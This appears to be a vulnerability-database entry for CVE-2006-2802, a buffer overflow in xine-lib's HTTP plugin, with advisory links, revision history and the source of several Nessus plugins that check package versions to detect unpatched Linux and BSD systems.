{"id": "CVE-2006-2802", "bulletinFamily": "NVD", "title": "CVE-2006-2802", "description": "Buffer overflow in the HTTP Plugin (xineplug_inp_http.so) for xine-lib 1.1.1 allows remote attackers to cause a denial of service (application crash) via a long reply from an HTTP server, as demonstrated using gxine 0.5.6.", "published": "2006-06-03T06:02:00", "modified": "2017-10-18T21:29:09", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2802", "reporter": "NVD", "references": ["http://www.debian.org/security/2006/dsa-1105", "https://exchange.xforce.ibmcloud.com/vulnerabilities/26972", "http://www.ubuntulinux.org/support/documentation/usn/usn-295-1", "http://www.securityfocus.com/bid/18187", "https://www.exploit-db.com/exploits/1852", "http://www.mandriva.com/security/advisories?name=MDKSA-2006:108", "http://security.gentoo.org/glsa/glsa-200609-08.xml", "http://lists.suse.com/archive/suse-security-announce/2006-Jun/0008.html"], "cvelist": ["CVE-2006-2802"], "type": "cve", "lastseen": "2017-10-19T11:12:24", "history": [{"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:xine:xine-lib:1.0.2", "cpe:/a:xine:gxine:0.5.6", "cpe:/a:xine:xine-lib:1.1.1", "cpe:/a:xine:xine-lib:1.0.1", "cpe:/a:xine:xine-lib:1.1.0"], "cvelist": ["CVE-2006-2802"], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "description": "Buffer overflow in the HTTP Plugin (xineplug_inp_http.so) for xine-lib 1.1.1 allows remote attackers to cause a denial of service (application crash) via a long reply from an HTTP server, as demonstrated using gxine 0.5.6.", "edition": 3, "enchantments": {}, "hash": "646e6c6a3415787cc2a22af27c531fc895976d422958e039ee1854854aa01b9b", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "a87208637ebfd4c8d7f5f3410b65bccb", "key": "published"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "df0f61697131d29b138ea016856adedc", "key": "description"}, {"hash": "2ec9f83f30fb9853954480afe1dab67a", "key": "cvelist"}, {"hash": "8b602250650aa69ade0751802b6a5f16", "key": "href"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "41c7399071b8b2c81edef5bc73c81eea", "key": "title"}, {"hash": "41c8d58778a9226074003212cf7532c9", "key": "references"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "3b9a481665537c6b74285d84d4094d8c", "key": "modified"}, {"hash": "a1b55b89776c55f4a2aa7200880ca185", "key": "cpe"}, {"hash": "84813b1457b92d6ba1174abffbb83a2f", "key": "cvss"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2802", "id": "CVE-2006-2802", "lastseen": "2017-07-20T10:49:20", "modified": "2017-07-19T21:31:47", "objectVersion": "1.3", "published": "2006-06-03T06:02:00", "references": ["http://www.debian.org/security/2006/dsa-1105", "https://exchange.xforce.ibmcloud.com/vulnerabilities/26972", "http://milw0rm.com/exploits/1852", "http://www.ubuntulinux.org/support/documentation/usn/usn-295-1", "http://www.securityfocus.com/bid/18187", "http://www.mandriva.com/security/advisories?name=MDKSA-2006:108", "http://security.gentoo.org/glsa/glsa-200609-08.xml", "http://lists.suse.com/archive/suse-security-announce/2006-Jun/0008.html"], "reporter": "NVD", "scanner": [], "title": "CVE-2006-2802", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 3, "lastseen": "2017-07-20T10:49:20"}, {"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:xine:xine-lib:1.0.2", "cpe:/a:xine:gxine:0.5.6", "cpe:/a:xine:xine-lib:1.1.1", "cpe:/a:xine:xine-lib:1.0.1", "cpe:/a:xine:xine-lib:1.1.0"], "cvelist": ["CVE-2006-2802"], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "description": "Buffer overflow in the HTTP Plugin (xineplug_inp_http.so) for xine-lib 1.1.1 allows remote attackers to cause a denial of service (application crash) via a long reply from an HTTP server, as demonstrated using gxine 0.5.6.", "edition": 1, "hash": "230f6a41c7032bddcc0d81235e32120409f3d16cafa3752ec477fbff26102a40", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "a87208637ebfd4c8d7f5f3410b65bccb", "key": "published"}, {"hash": "2069dd3486467f0d5dace3cf26a64b2a", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "df0f61697131d29b138ea016856adedc", "key": "description"}, {"hash": "2ec9f83f30fb9853954480afe1dab67a", "key": "cvelist"}, {"hash": "8b602250650aa69ade0751802b6a5f16", "key": "href"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "41c7399071b8b2c81edef5bc73c81eea", "key": "title"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "a1b55b89776c55f4a2aa7200880ca185", "key": "cpe"}, {"hash": "84813b1457b92d6ba1174abffbb83a2f", "key": "cvss"}, {"hash": "5bc6da635ec3fc20af43b765b0a29bc5", "key": "references"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2802", "id": "CVE-2006-2802", "lastseen": "2016-09-03T07:02:48", "modified": "2011-03-07T21:37:03", "objectVersion": "1.2", "published": "2006-06-03T06:02:00", "references": ["http://xforce.iss.net/xforce/xfdb/26972", "http://www.debian.org/security/2006/dsa-1105", "http://milw0rm.com/exploits/1852", "http://www.ubuntulinux.org/support/documentation/usn/usn-295-1", "http://www.securityfocus.com/bid/18187", "http://www.mandriva.com/security/advisories?name=MDKSA-2006:108", "http://security.gentoo.org/glsa/glsa-200609-08.xml", "http://lists.suse.com/archive/suse-security-announce/2006-Jun/0008.html"], "reporter": "NVD", "scanner": [], "title": "CVE-2006-2802", "type": "cve", "viewCount": 0}, "differentElements": ["modified"], "edition": 1, "lastseen": "2016-09-03T07:02:48"}, {"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:xine:xine-lib:1.0.2", "cpe:/a:xine:gxine:0.5.6", "cpe:/a:xine:xine-lib:1.1.1", "cpe:/a:xine:xine-lib:1.0.1", "cpe:/a:xine:xine-lib:1.1.0"], "cvelist": ["CVE-2006-2802"], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "description": "Buffer overflow in the HTTP Plugin (xineplug_inp_http.so) for xine-lib 1.1.1 allows remote attackers to cause a denial of service (application crash) via a long reply from an HTTP server, as demonstrated using gxine 0.5.6.", "edition": 2, "enchantments": {}, "hash": "9db10d5524318fa173dac67697f5341d7d56f9e7b9235d3e9d4c6e08a6db56de", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "a87208637ebfd4c8d7f5f3410b65bccb", "key": "published"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "df0f61697131d29b138ea016856adedc", "key": "description"}, {"hash": "2ec9f83f30fb9853954480afe1dab67a", "key": "cvelist"}, {"hash": "8b602250650aa69ade0751802b6a5f16", "key": "href"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "41c7399071b8b2c81edef5bc73c81eea", "key": "title"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "a1b55b89776c55f4a2aa7200880ca185", "key": "cpe"}, {"hash": "84813b1457b92d6ba1174abffbb83a2f", "key": "cvss"}, {"hash": "5bc6da635ec3fc20af43b765b0a29bc5", "key": "references"}, {"hash": "c0a9298470c4f11d9769920f16a3ef34", "key": "modified"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2802", "id": "CVE-2006-2802", "lastseen": "2017-04-18T15:51:50", "modified": "2017-02-19T00:12:49", "objectVersion": "1.2", "published": "2006-06-03T06:02:00", "references": ["http://xforce.iss.net/xforce/xfdb/26972", "http://www.debian.org/security/2006/dsa-1105", "http://milw0rm.com/exploits/1852", "http://www.ubuntulinux.org/support/documentation/usn/usn-295-1", "http://www.securityfocus.com/bid/18187", "http://www.mandriva.com/security/advisories?name=MDKSA-2006:108", "http://security.gentoo.org/glsa/glsa-200609-08.xml", "http://lists.suse.com/archive/suse-security-announce/2006-Jun/0008.html"], "reporter": "NVD", "scanner": [], "title": "CVE-2006-2802", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 2, "lastseen": "2017-04-18T15:51:50"}], "edition": 4, "hashmap": [{"key": "assessment", "hash": "6d3f4796275bb54c21a33b82f399cc6d"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "a1b55b89776c55f4a2aa7200880ca185"}, {"key": "cvelist", "hash": "2ec9f83f30fb9853954480afe1dab67a"}, {"key": "cvss", "hash": "84813b1457b92d6ba1174abffbb83a2f"}, {"key": "description", "hash": "df0f61697131d29b138ea016856adedc"}, {"key": "href", "hash": "8b602250650aa69ade0751802b6a5f16"}, {"key": "modified", "hash": "b7c39fdfa148d15bf300f0027cade139"}, {"key": "published", "hash": "a87208637ebfd4c8d7f5f3410b65bccb"}, {"key": "references", "hash": "9f17666d30596450aae641a0438ce1ca"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "41c7399071b8b2c81edef5bc73c81eea"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "69d69c2ce09757f657828c3741aca8df40feaf5b40f1dbaaa5f44918554b10ac", "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE", "modified": "2017-10-19T11:12:24"}, "vulnersScore": 5.0}, "objectVersion": "1.3", "cpe": ["cpe:/a:xine:xine-lib:1.0.2", "cpe:/a:xine:gxine:0.5.6", "cpe:/a:xine:xine-lib:1.1.1", "cpe:/a:xine:xine-lib:1.0.1", "cpe:/a:xine:xine-lib:1.1.0"], "assessment": {"href": "", "name": "", "system": ""}, "scanner": []}

{"nessus": [{"lastseen": "2018-09-02T00:07:35", "references": [], "pluginID": "27867", "description": "Federico L. Bossi Bonin discovered a buffer overflow in the HTTP input module. By tricking an user into opening a malicious remote media location, a remote attacker could exploit this to crash Xine library frontends (like totem-xine, gxine, or xine-ui) and possibly even execute arbitrary code with the user's privileges.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 5, "reporter": "Tenable", "published": "2007-11-10T00:00:00", "title": "Ubuntu 5.04 / 5.10 / 6.06 LTS : xine-lib vulnerability (USN-295-1)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-2802"], "modified": "2018-08-15T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libxine-dev", "p-cpe:/a:canonical:ubuntu_linux:libxine-main1", "p-cpe:/a:canonical:ubuntu_linux:libxine1c2", "p-cpe:/a:canonical:ubuntu_linux:libxine1", "cpe:/o:canonical:ubuntu_linux:5.04", "cpe:/o:canonical:ubuntu_linux:5.10", "cpe:/o:canonical:ubuntu_linux:6.06:-:lts"], "id": "UBUNTU_USN-295-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=27867", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-295-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(27867);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/08/15 12:24:48\");\n\n script_cve_id(\"CVE-2006-2802\");\n script_xref(name:\"USN\", value:\"295-1\");\n\n script_name(english:\"Ubuntu 5.04 / 5.10 / 6.06 LTS : xine-lib vulnerability (USN-295-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Federico L. Bossi Bonin discovered a buffer overflow in the HTTP input\nmodule. By tricking an user into opening a malicious remote media\nlocation, a remote attacker could exploit this to crash Xine library\nfrontends (like totem-xine, gxine, or xine-ui) and possibly even\nexecute arbitrary code with the user's privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libxine-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libxine-main1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libxine1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libxine1c2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/11/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2007-2018 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(5\\.04|5\\.10|6\\.06)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 5.04 / 5.10 / 6.06\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"5.04\", pkgname:\"libxine-dev\", pkgver:\"1.0-1ubuntu3.7\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"libxine1\", pkgver:\"1.0-1ubuntu3.7\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"libxine-dev\", pkgver:\"1.0.1-1ubuntu10.3\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"libxine1c2\", pkgver:\"1.0.1-1ubuntu10.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libxine-dev\", pkgver:\"1.1.1+ubuntu2-7.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libxine-main1\", pkgver:\"1.1.1+ubuntu2-7.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxine-dev / libxine-main1 / libxine1 / libxine1c2\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:42:45", "references": ["https://security.gentoo.org/glsa/200609-08"], "pluginID": "22353", "description": "The remote host is affected by the vulnerability described in GLSA-200609-08 (xine-lib: Buffer overflows)\n\n xine-lib contains buffer overflows in the processing of AVI.\n Additionally, xine-lib is vulnerable to a buffer overflow in the HTTP plugin (xineplug_inp_http.so) via a long reply from an HTTP server.\n Impact :\n\n An attacker could trigger the buffer overflow vulnerabilities by enticing a user to load a specially crafted AVI file in xine. This might result in the execution of arbitrary code with the rights of the user running xine. Additionally, a remote HTTP server serving a xine client a specially crafted reply could crash xine and possibly execute arbitrary code.\n Workaround :\n\n There is no known workaround at this time.", "edition": 5, "reporter": "Tenable", "published": "2006-09-15T00:00:00", "title": "GLSA-200609-08 : xine-lib: Buffer overflows", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Gentoo Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-2802"], "modified": "2018-07-11T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:xine-lib"], "id": "GENTOO_GLSA-200609-08.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=22353", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200609-08.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22353);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/07/11 17:09:25\");\n\n script_cve_id(\"CVE-2006-2802\");\n script_bugtraq_id(18187);\n script_xref(name:\"GLSA\", value:\"200609-08\");\n\n script_name(english:\"GLSA-200609-08 : xine-lib: Buffer overflows\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200609-08\n(xine-lib: Buffer overflows)\n\n xine-lib contains buffer overflows in the processing of AVI.\n Additionally, xine-lib is vulnerable to a buffer overflow in the HTTP\n plugin (xineplug_inp_http.so) via a long reply from an HTTP server.\n \nImpact :\n\n An attacker could trigger the buffer overflow vulnerabilities by\n enticing a user to load a specially crafted AVI file in xine. This\n might result in the execution of arbitrary code with the rights of the\n user running xine. Additionally, a remote HTTP server serving a xine\n client a specially crafted reply could crash xine and possibly execute\n arbitrary code.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200609-08\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All xine-lib users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-libs/xine-lib-1.1.2-r2'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:xine-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/09/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/09/15\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"media-libs/xine-lib\", unaffected:make_list(\"ge 1.1.2-r2\"), vulnerable:make_list(\"lt 1.1.2-r2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xine-lib\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-02T00:01:44", "references": [], "pluginID": "27484", "description": "Missing length checks in the HTTP plugin could lead to a buffer overflow on the heap (CVE-2006-2802).", "edition": 5, "reporter": "Tenable", "published": "2007-10-17T00:00:00", "title": "openSUSE 10 Security Update : xine-lib (xine-lib-1599)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-2802"], "modified": "2018-07-19T00:00:00", "cpe": ["cpe:/o:novell:opensuse:10.1", "p-cpe:/a:novell:opensuse:xine-lib", "p-cpe:/a:novell:opensuse:xine-lib-32bit"], "id": "SUSE_XINE-LIB-1599.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=27484", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update xine-lib-1599.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(27484);\n script_version (\"1.9\");\n script_cvs_date(\"Date: 2018/07/19 23:54:24\");\n\n script_cve_id(\"CVE-2006-2802\");\n\n script_name(english:\"openSUSE 10 Security Update : xine-lib (xine-lib-1599)\");\n script_summary(english:\"Check for the xine-lib-1599 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Missing length checks in the HTTP plugin could lead to a buffer\noverflow on the heap (CVE-2006-2802).\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected xine-lib packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xine-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xine-lib-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.1\", reference:\"xine-lib-1.1.1-24.6\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", cpu:\"x86_64\", reference:\"xine-lib-32bit-1.1.1-24.6\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xine-lib / xine-lib-32bit\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:50:53", "references": ["http://www.nessus.org/u?0ec40fd0"], "pluginID": "21700", "description": "A Secunia Advisory reports :\n\nFederico L. Bossi Bonin has discovered a weakness in xine-lib, which can be exploited by malicious people to crash certain applications on a user's system.\n\nThe weakness is cause due to a heap corruption within the 'xineplug_inp_http.so' plugin when handling an overly large reply from the HTTP server. This can be exploited to crash an application that uses the plugin (e.g. gxine).", "edition": 4, "reporter": "Tenable", "published": "2006-06-16T00:00:00", "title": "FreeBSD : libxine -- buffer overflow vulnerability (107e2ee5-f941-11da-b1fa-020039488e34)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-2802"], "modified": "2013-06-21T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:libxine"], "id": "FREEBSD_PKG_107E2EE5F94111DAB1FA020039488E34.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=21700", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2013 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 